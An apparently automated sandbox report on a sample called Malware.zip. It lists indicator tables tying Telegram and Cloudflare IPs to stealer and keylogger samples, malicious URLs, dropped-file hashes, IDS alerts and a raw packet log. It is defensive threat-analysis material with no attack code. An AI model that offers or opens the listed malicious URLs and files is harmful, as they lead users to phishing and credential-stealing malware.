149.154.167.99 | http://telegramtw1.org/ | malicious | Unknown | telegram.org/?setln=pl
149.154.167.99 | http://makkko.kz/ | malicious | Unknown | telegram.org/
149.154.167.99 | http://telegram.dog | malicious | Unknown | telegram.dog/
149.154.167.99 | LnSNtO8JIa.exe | malicious | Cinoshi Stealer | t.me/cinoshibot
Match | Associated Sample Name / URL | Detection | Threat Name | Context
t.me | External2.4.exe1.exe | malicious | LummaC Stealer | 149.154.167.99
t.me | Loader.exe | malicious | LummaC Stealer | 149.154.167.99
t.me | Superority.exe1.exe | malicious | LummaC Stealer | 149.154.167.99
t.me | ResPencil.5.6.1.exe | malicious | Unknown | 149.154.167.99
t.me | ALfzrNn09x.exe | malicious | LummaC Stealer | 149.154.167.99
t.me | EasyWay.exe | malicious | LummaC Stealer | 149.154.167.99
t.me | Aura.exe | malicious | LummaC Stealer | 149.154.167.99
t.me | EasyWay.exe | malicious | LummaC Stealer | 149.154.167.99
t.me | Aura.exe | malicious | LummaC Stealer | 149.154.167.99
                                                                                                                                                                                                                      SecuriteInfo.com.Trojan.PWS.Lumma.1819.11767.23234.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      plus.l.google.comhttps://rightful-faithful-kettledrum.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.185.238
                                                                                                                                                                                                                      https://excitedgleamingrefrigerate.com/vk5vsp1ayymkey=5e919c21ede3f1e9ee4f39f38bb2bdebGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 216.58.206.46
                                                                                                                                                                                                                      Online Notification.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 142.250.185.174
                                                                                                                                                                                                                      https://2ly.link/25AOkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.186.142
                                                                                                                                                                                                                      http://www.google.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.186.142
                                                                                                                                                                                                                      Solicitud de cotizacion de productos RFQ9505247.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 216.58.212.142
                                                                                                                                                                                                                      f1215469392.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.185.142
                                                                                                                                                                                                                      ReK7Ewx.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.186.174
                                                                                                                                                                                                                      413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 142.250.185.206
                                                                                                                                                                                                                      Magic_V_pro_setup_stable_latest_release_version_9_709.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 142.250.181.238
                                                                                                                                                                                                                      play.google.comhttps://rightful-faithful-kettledrum.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 216.58.206.78
                                                                                                                                                                                                                      https://excitedgleamingrefrigerate.com/vk5vsp1ayymkey=5e919c21ede3f1e9ee4f39f38bb2bdebGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.185.206
                                                                                                                                                                                                                      https://docs.google.com/forms/d/e/1FAIpQLSerD3TiLe71wYLfxltb7xs0UPwZ1bDohJF0kC_aBDKnCQeN0A/viewform?usp=send_formGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.181.238
                                                                                                                                                                                                                      https://www.youtube.com/channel/UCzwxIBbA4-VpGrl_cZagU9QGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.186.46
                                                                                                                                                                                                                      https://2ly.link/25AOkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.217.18.14
                                                                                                                                                                                                                      http://www.google.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.181.238
                                                                                                                                                                                                                      Solicitud de cotizacion de productos RFQ9505247.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.217.16.206
                                                                                                                                                                                                                      https://sites.google.com/view/mdooee/accueil?authuser=2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 216.58.206.46
                                                                                                                                                                                                                      https://cdn-facxxx.b-cdn.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.186.78
                                                                                                                                                                                                                      https://youtu.be/lqfR3CHGCNQ?si=o9SA3JjXZZDT0hewGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.185.174
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | mXjBoW24W3.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | TgmlmFK3Ol.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | niceworkingskilldevelopedwithgreatnews.hta | malicious | Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | 149.154.167.220
TELEGRAMRU | ap3rCD0rxv.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | 6bHVQxQ4Wu.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | z2TIhJXb0s.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | XFCaCR5AKj.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | NXQOX3keIQ.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | ap3rCD0rxv.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | z2TIhJXb0s.exe | malicious | Unknown | 149.154.167.220
CLOUDFLARENETUS | VYxKYUIYs4.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.112.1
CLOUDFLARENETUS | mXjBoW24W3.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
CLOUDFLARENETUS | path.exe | malicious | Unknown | 162.159.136.232
CLOUDFLARENETUS | jklarm7.elf | malicious | Unknown | 1.12.16.69
CLOUDFLARENETUS | TgmlmFK3Ol.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
CLOUDFLARENETUS | xmGCsTzlDA.exe | malicious | FormBook | 104.21.64.1
CLOUDFLARENETUS | https://rightful-faithful-kettledrum.glitch.me/ | malicious | Unknown | 104.18.31.78
CLOUDFLARENETUS | http://video.sibnet.ru | malicious | HTMLPhisher | 1.1.1.1
CLOUDFLARENETUS | GTA_installer.exe | malicious | Unknown | 104.18.11.89
CLOUDFLARENETUS | zkwindow.exe | malicious | RedLine | 188.114.97.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Launcher.exe | malicious | Unknown | 104.21.11.150, 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | CryptocommSetup.msi | malicious | BumbleBee | 104.21.11.150, 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | COTA#U00c7#U00c3O.xls | malicious | Unknown | 104.21.11.150, 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | Order_Mar25.xls | malicious | Unknown | 104.21.11.150, 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 104.21.11.150, 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | COTA#U00c7#U00c3O.xls | malicious | Unknown | 104.21.11.150, 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | Order_Mar25.xls | malicious | Unknown | 104.21.11.150, 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | POETDB24-2577.xla.xlsx | malicious | Unknown | 104.21.11.150, 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | POETDB24-25771.xla.xlsx | malicious | Unknown | 104.21.11.150, 149.154.167.99
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 104.21.11.150, 149.154.167.99
                                                                                                                                                                                                                      No context
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text
Category:downloaded
Size (bytes):29
Entropy (8bit):3.9353986674667634
Encrypted:false
SSDEEP:3:VQAOx/1n:VQAOd1n
MD5:6FED308183D5DFC421602548615204AF
SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:false
Reputation:high, very likely benign file
URL:https://www.google.com/async/newtab_promos
Preview:)]}'.{"update":{"promos":{}}}
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (1437)
Category:downloaded
Size (bytes):117390
Entropy (8bit):5.490758436358278
Encrypted:false
SSDEEP:3072:jMyvhJyj1UjPEWKcxUww3wM0W/N79419n5QJEx:jMyfyj1cPPC70W/Na5QJEx
MD5:B52266FAD5115039E3806FF8DCD71F86
SHA1:8007278E322C8EA9F3CB5B62008E3E3599E9F659
SHA-256:E390D05D78F6E51B03F7C3D1D0C3B7C3E79B3D53C4F83685CFAD83D2E863456E
SHA-512:58293A89F48926A7059F6C91AA79EBD941072D3BC31AA571342ABA76F007981750620F960CCB59E9E3C828FC8E1748B500E3138381D82EF8A171AD7C60F5C5FC
Malicious:false
Reputation:moderate, very likely benign file
URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0"
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (65531)
Category:downloaded
Size (bytes):132154
Entropy (8bit):5.436662961080419
Encrypted:false
SSDEEP:3072:M+GkpdApMNrBdM1rG5wFazHWDEvhW/6z6x0zW:j3dAcddM1rG5wFazHkEvhu46AW
MD5:362867BC7334A5F7DC32D7464490424B
SHA1:E9579A9E939A7A8AAC8EAD68BB2DD15E8ED542AC
SHA-256:36FB7441F6C694C6F6A19239C594877C1DF603ECE3E065C0C03B10974CE4408D
SHA-512:B44123D482F4789CED37F257FE24FCDB409658863BA5A9AA666694BF06FBBC53D62347CDE5BDE625724F2B831EFA2B963B6308E64AED386AF37AAB0E92BA3466
Malicious:false
Reputation:low
URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (2412)
Category:downloaded
Size (bytes):172367
Entropy (8bit):5.555151369878942
Encrypted:false
SSDEEP:3072:VYTnZPpkkAVa5OwOYCNwWYMJ20IovCVcXBK28hhqfFQP+n/fmgxZJcQ4zX+te2Wd:VYTnZukAVa5OwOYCNwW3J20IovucXBKJ
MD5:F127A30F593CB96090AF164F4DD04E94
SHA1:8E45FAD5740967D50101E413F98F646D424E9385
SHA-256:6BE436287AF7A70143564DB4F2FFDCE5DED1241FFE85BF210E4495F873C63A33
SHA-512:D1A5DD175ABE8C4C7EC5C9E534E5C4B30A6F954F290ED05001FDDE5A6A92CF398604180BD1CCFB856A7C81B08C19F841624E4AECA7AB135B0C404C03E84989FC
Malicious:false
Reputation:moderate, very likely benign file
URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.WcyoQrvsWY0.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTt0d-Ss5kisT1M_8rsOzCdvCZrVWg"
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:SVG Scalable Vector Graphics image
Category:downloaded
Size (bytes):1660
Entropy (8bit):4.301517070642596
Encrypted:false
SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:554640F465EB3ED903B543DAE0A1BCAC
SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:false
URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (2970)
Category:downloaded
Size (bytes):2975
Entropy (8bit):5.8723599307903855
Encrypted:false
SSDEEP:48:ULkzKlgJXwRDaa74aa9ld66666e0CrEIaZhvv59LHJY+JU3kzZLvx47OSyFw2ACm:UNl4Fd66666rCrEXk+JU3kz5547OtIgM
MD5:42BE0FBDF66ECA374708F437157A6965
SHA1:375545D1028616DE998122D24D25A9982F1D1A54
SHA-256:9D201A1332012B88E4BA61549EFD183ECAF32A41F78FDA64D18CFCB4D993A24D
SHA-512:0EE06CC90AD5B5BA0FF3A825B5BAC6257C210F053B6C76CE5D79E71C6E8AF73F8FB7BC3CFFF07D51211E1B8CB84295E97ADC8AD13F8345DA310548C288D39A5F
Malicious:false
URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (5162), with no line terminators
Category:downloaded
Size (bytes):5162
Entropy (8bit):5.349865760247148
Encrypted:false
SSDEEP:96:mtOTUb1db1ClNY5co7shdiUYVqig7O7aZCUgpgXEt94k+g8IHh8u928DoCLQ:mtOT8TfL1Vqig7mIg8IB8u88DA
MD5:70A8F21806E7F1B739937970EBE49A0C
SHA1:6BE9EEBCE438DE91FEB20E6A5458774B327AA9B4
SHA-256:C8B531CFD6E9BE13762E289820F67406331303CD5111A885DE959BF83DD0F5AC
SHA-512:3C055567D0ED53BD30773C0BE475DC7499E44AFB92FB05021029D9A0C1299A470CDD3A8CACCCF798D5345ED627C5836E9DF5955A120FE56BA3624EC76A673270
Malicious:false
URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.L8bgMGq1rcI.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTuS2lB4IRlJuMaoM0QgSoTOihj9Bg"
                                                                                                                                                                                                                      File type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                      Entropy (8bit):7.997627482833052
                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                      • ZIP compressed archive (8000/1) 99.91%
                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
                                                                                                                                                                                                                      File name:Malware.zip
                                                                                                                                                                                                                      File size:56'892'136 bytes
                                                                                                                                                                                                                      MD5:b48d83e332b091b2f8556ce414d02528
                                                                                                                                                                                                                      SHA1:77ce378b412ffaaac214a1ac80fe491ef495d69c
                                                                                                                                                                                                                      SHA256:3a44c0cf9db5c5130555a0d8e03893cf701e9145b98c0d469ca8b2b00d70fcd2
                                                                                                                                                                                                                      SHA512:221d25963519cd819bef8d8cf7faa426043725df8e463b3e94b0bf5b2cd28a123c51e76b22f3a49bdfe5a6b16dee958830f672a18d448f120bdd25443a5b693d
                                                                                                                                                                                                                      SSDEEP:1572864:lanPwJ92mnvvVXeKfR0GUVXAFaoSYXtvXKYK+jiHEq51gDjLq:lKHcNXeKfR0GUJAFIYX5KYK+WH51/
                                                                                                                                                                                                                      TLSH:77C73341D2C66848FE62DBA847028C3574C22646953AEBFDE18EB0B57492E7C4B7F734
                                                                                                                                                                                                                      File Content Preview:PK..........jZ................Malware/PK.........]IZ................Malware/data/PK........P./T.f..Z...........Malware/data/ALI213.ini.V.n.@.>.R.aU. ...'iA.rc.".&j.AU!.&.c........$......@%...?.T!.\y.f.N..p.M,..7......z....]+<7=u`...9..\...8.Ll.........BU;
                                                                                                                                                                                                                      Icon Hash:1c1c1e4e4ececedc
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-11T00:42:37.600801+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49701 | 149.154.167.99 | 443 | TCP
2025-03-11T00:42:39.657690+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49702 | 104.21.11.150 | 443 | TCP
2025-03-11T00:42:41.315049+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.16 | 49703 | 104.21.11.150 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.923047066 CET44349713142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.923131943 CET49713443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.923517942 CET49713443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.923537016 CET44349713142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.987082958 CET49714443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.987154007 CET44349714142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.987284899 CET49714443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.987730026 CET49714443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.987756014 CET44349714142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.988039017 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.988097906 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.988162041 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.988460064 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:45.988480091 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.297880888 CET44349708142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.297960043 CET49708443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.694824934 CET44349711142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.695247889 CET49711443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.695282936 CET44349711142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.696343899 CET44349711142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.696423054 CET49711443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.698535919 CET49711443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.698600054 CET44349711142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.698971987 CET49711443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.698978901 CET44349711142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.746519089 CET49711443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.896513939 CET44349713142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.896853924 CET49713443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.896883965 CET44349713142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.899333000 CET44349713142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.899394989 CET49713443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.899749994 CET49713443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.899919987 CET49713443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.899975061 CET44349713142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.906789064 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.907027960 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.907059908 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.910939932 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.911026001 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.911334038 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.911489964 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.911832094 CET44349714142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.912081003 CET49714443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.912108898 CET44349714142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.912213087 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.913207054 CET44349714142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.913285971 CET49714443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.913592100 CET49714443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.913671017 CET44349714142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.913733959 CET49714443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.913741112 CET44349714142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.954513073 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.954516888 CET49713443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.954521894 CET49714443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.954525948 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:47.954555035 CET44349713142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.002523899 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.002535105 CET49713443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.218007088 CET44349711142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.218072891 CET44349711142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.218120098 CET49711443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.218147039 CET44349711142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.220617056 CET44349711142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.220680952 CET49711443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.220694065 CET44349711142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.220762014 CET44349711142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.220838070 CET49711443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.220900059 CET49711443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.220912933 CET44349711142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.315865040 CET49713443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.316030025 CET44349713142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.316092014 CET49713443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.434688091 CET44349714142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.438374043 CET44349714142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.438432932 CET49714443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.439373016 CET49714443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.439392090 CET44349714142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.461204052 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.461293936 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.461340904 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.461343050 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.461364031 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.461401939 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.461404085 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.461416960 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.461482048 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.461494923 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.467812061 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.467849016 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.467873096 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.467881918 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.467931986 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.542386055 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.553333998 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.553386927 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.553406000 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.553416967 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.774979115 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.775118113 CET49715443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:48.775135994 CET44349715142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:49.714145899 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:49.714191914 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:49.714302063 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:49.714654922 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:49.714673996 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.617604971 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.617989063 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.618006945 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.619091034 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.619165897 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.620153904 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.620255947 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.660576105 CET49720443192.168.2.16142.250.74.196
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.660598993 CET44349720142.250.74.196192.168.2.16
                                                                                                                                                                                                                      Mar 11, 2025 00:42:51.708641052 CET49720443192.168.2.16142.250.74.196
